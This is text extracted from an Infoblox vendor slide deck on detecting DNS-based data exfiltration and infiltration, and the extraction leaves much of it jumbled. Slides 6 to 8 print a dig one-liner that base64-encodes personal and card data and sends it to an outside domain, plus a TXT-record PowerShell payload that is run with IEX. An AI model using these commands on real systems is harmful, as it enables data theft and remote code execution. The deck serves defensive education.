1

1 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
 How to Secure Your Data From DNS based Exfiltration
Philip Parker, Vadim Pavlov
95056.39
2
2 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
 Who are we?

Infoblox Senior Technical Marketing Engineers - Security

Philip Parker

Vadim Pavlov

3
3 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
 Agenda

• Stealing Data – Why and What Kind?

• DNS as a Pathway for Data In/Ex filtration
• Infoblox ActiveTrust Cloud
• Demo

4
4 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
What the Bad Guys are After and Why
Information like social security numbers of employees or customers
PII (Personally
that cybercriminals can use to steal identity, or sell in the
Identifiable Information) underground market for profit

Regulated Data Data related to PCI DSS and HIPAA compliance that can be misused

Intellectual Property Data that can give an organization a competitive advantage

Other Sensitive Credit card numbers, company financials, payroll and emails and deny
Information access to this and other data (Ransomware)

Hacktivism Espionage Financial Profit RansomWare

5
5 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
DNS tunneling attacks
let infected endpoints
or malicious insiders
Attackers have recently
used DNS tunneling in 46%
cases involving the theft of of large businesses
exfiltrate data.
millions of accounts.1 have experienced
DNS exfiltration.2

A recent
$4 M high-profile data
breach is likely to
cost more than4
Average consolidated
cost of a data breach3
$100M.
6
6 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Data Exfiltration/Infiltration DNS Queries
• Sophisticated (zero-day)
• Infected endpoint gets access to file containing Attacker controller
server- thief.com
sensitive data (C&C)
NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com

• It encrypts and converts info into encoded format

C&C commands Data
• Text broken into chunks and sent via DNS using INTERNET

hostname.subdomain, TXT records and other

ENTERPRISE
Resource Records
• Tranferred data reconstructed at the other end
• Can use spoofed addresses to avoid detection
DNS server

Data Exfiltration via host/subdomain

Simplified/unencrypted example: NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com
MarySmith.foo.thief.com
SSN-543112197.foo.thief.com Infected
DOB-04-10-1999.foo.thief.com endpoint
MRN100045429886.foo.thief.com

7
7 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
DNS Exfiltration
Client request
$ echo " John/Smith/1234123412340987/94040 " | base64 | xargs -I '{}' dig {}.xn---d1asm.net

; <<>> DiG 9.8.3-P1 <<>> IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net

;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36238
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net. IN A

;; AUTHORITY SECTION:
xn---d1asm.net. 1800 IN SOA ns1.xn--d1asm.net. root.xn---d1asm.net. 201702301 3600 3600 3600 1800

;; Query time: 20 msec

;; SERVER: 208.69.39.2#53(208.69.39.2)
;; WHEN: Wed Jun 14 12:15:22 2017
;; MSG SIZE rcvd: 125

DNS Server query log

14-Jun-2017 12:15:22.614 queries: info: client 192.0.0.10#30531 (IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---
d1asm.net): query: IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net IN A -ED (192.0.0.1)

8
8 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
DNS Infiltration
Client request
$ dig dnsmsg....xn---d1asm.net TXT

; <<>> DiG 9.8.3-P1 <<>> dnsmsg.....xn---d1asm.net TXT

;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45611
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;dnsmsg....xn---d1asm.net. IN TXT

;; ANSWER SECTION:dnsmsg.....xn---d1asm.net. 30 IN TXT "$e='H4sIAAAAAAAEAM0c/VfbOPL3/BV6eezVPsgn0GOXl31

unUArclm5T4LYQ8qhjq8Yl2KnjNHBp/vebkWTHiWWXFuvt9XVrx5ZGo/nWzHg35hM79MbRbzeNzvUN/GnAv3jbWJAO2fCno9F+Z1
WM56LrRwZcdvMKdcpAAwwd0cCAOaq5BEWt1xA0O+JexYfTP2UNUP/TtwPF8'\;" "$e+='n40dB6R/+GCzMdb+BoIYogi/4Cwx1DU
/2cFi/tKWTSykFoSkcCwf2Fw2PmCtX12x7OQA6rea9Xpre0BqnwPPFw1L6lpoPoQdgPCPdQhxaVQW7pcdT0ImC7bkRqS1J+uWN
JnQ3I8sY+K6WfTobAyBp89u/VGzFBBSC8k6qM5+G52kgYiYWZS2nAenPhR66WhXKGPNE0R'\;“ "$e+='vLEihOuYCyHMAE8KZ3
lbp/kBika3JIKb27zRWVrjnepEp8yyjIUYZZyZ6mzxzqY1bS4WM4O/MjzMREmheMH3XxuBKmcsT2oFFSGcoMPskqr78RwqbKLaqE
SZObnLOKnPl+2+8nowI'\;" "$e+='Lir/A2EIemK1TAAA'\;" "$d = dec($e)\;" "IEX $d\;" "cotte -Domain cspg.pw -e cmd.exe"

;; Query time: 4 msec

;; SERVER: 208.69.39.2#53(208.69.39.2)
;; WHEN: Wed Jun 14 12:33:15 2017
;; MSG SIZE rcvd: 666

9
9 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Communications via DNS Tunneling
• Uses DNS as a covert communication channel to bypass Internet
firewalls
• Attacker tunnels other protocols like SSH, or web within DNS INTERNET

• Enables attackers to easily insert malware, pass stolen

ENTERPRISE
data or tunnel IP traffic without detection IP traffic/
• A DNS tunnel can be used as a full bi-directional remote- Data

control channel for a compromised internal host

Some well known “Proof of Concept” Tunneling software DNS
Encoded server
• Iodine
IP/Data
• OzymanDNS in DNS queries

• SplitBrain
Client-side
• DNS2TCP tunnel program

10 | | ©©2017
10 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
 Infoblox ActiveTrust® Cloud

Protect Devices Everywhere—On-Premises,

Roaming and in Remote Office/Branch Office

11 | | ©©2017
11 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Traditional Network Security does not address
Security Gap in DNS
Advanced DNS Block Zero Day Data Block advance malware Block DNS Server
Threats vs Network Exfiltration & communications over attacks (e.g.
Security Layers Infiltration over DNS DNS (e.g. DGA,Fast Flux) NXDomain, Hijack)

Sandboxing (APT) No No No

End Point Malware/AV No No No

Secure Web Gateway No No No

NGFW, IDS/IPS No No No

DLP No No No

DDOS No No Rate Limiting only

Secure DNS Yes Yes Yes

12 | | ©©2017
12 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
ActiveTrust® Cloud—Functional Summary
Highly scalable protection for devices on-premises, roaming and in remote office/branch office

Detect and Contain Prevent DNS Based Data Exfiltration Improved Visibility
Malware using DNS That Other Systems Can’t Detect and Context

Stop C&C/botnet Data Exfiltration, Improved Visibility Unified Policy Ecosystem

communications at DGA, Fast Flux, and Rich Network Management, analytics Integrations (with
DNS choke point DNS Messenger Context and reporting on-premise option)
detection using
machine learning

13 | | ©©2017
13 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Components

DNS Firewall/DNS Threat Insight - Data Verified Threat Dossier - Threat

Response Policy Exfiltration, DGA, Intelligence Investigation
Zones (RPZs) Fast Flux and DNS
Messenger Detection

Cloud Services Reporting and ActiveTrust Endpoint Recursive DNS

Portal Analytics or Services with geo-
DNS Forwarding location response
Proxy (agentless)

ActiveTrust Cloud tightly integrates with on-premises DDI for enriched visibility and ecosystem integrations
14 | | ©©2017
14 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
ATC Workflow Scenarios Encrypted DNS Query,
Embeds Client ID and MAC

(With DNS Forwarding Proxy)

(No DNS Forwarding Proxy)

Connector

15 | | ©©2017
15 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Threat Insight - Behavior Analytics
with Machine Learning
Entropy
 Detects and prevents 0-day DNS based
threats
Size Lexical
 Automatically adds destinations to RPZ Analysis
feed and scales enforcement
Model
 Detects and prevents:
• DNS Tunneling
Frequency N-Gram
• Data Exfiltration/Infiltration
• DGA
• Fastflux
• DNS Messenger

16 | | ©©2017
16 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
 How Behavior Analytics Works
Detects sophisticated data exfiltration techniques
that don’t have well-known signatures (zero day)

1. Looks at TXT records, A, AAAA records

Entropy
2. Detects presence of data using lexical and
temporal analysis
3. Certain attributes add to a threat score, others
Size Lexical
subtract from it
4. Final score classifies a request as exfiltration or
Analysis
not Model
5. If exfiltration is found, automatically adds
destinations to special internal RPZ feed
Frequency N-Gram
6. Scales protection to other parts of the network

17 | | ©©2017
17 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
How DNS Threat Insight Works to Detect Data
Exfiltration Threat Insight analyzes based on
Queried Domains

MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.joedomain.com • Length of subdomain

www.google.com • The way the letters are

organized
NVWW2IDPOZQWY5DJNZSQ.t.joedomain.com
Inca.Infoblox.com • Amount of information

Malicious Normal

MRZGS3TLEBWW64TFEBXXMYLMOR
UW4ZI.t.joedomain.com www.google.com
*.t.joedomain.com Inca.Infoblox.com
NVWW2IDPOZQWY5DJNZSQ.t.joedoma
in.com

18 | | ©©2017
18 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
The Motion of Malware Through Networks
Malware uses DNS at every stage
Penetration/Infiltration Infection Ex/Infiltration
Query malicious domains and Download Malware to the Transport the data offsite
report to C &C infected host

DNS Server
19 | | ©©2017
19 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Demo

20 | | ©©2017
20 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.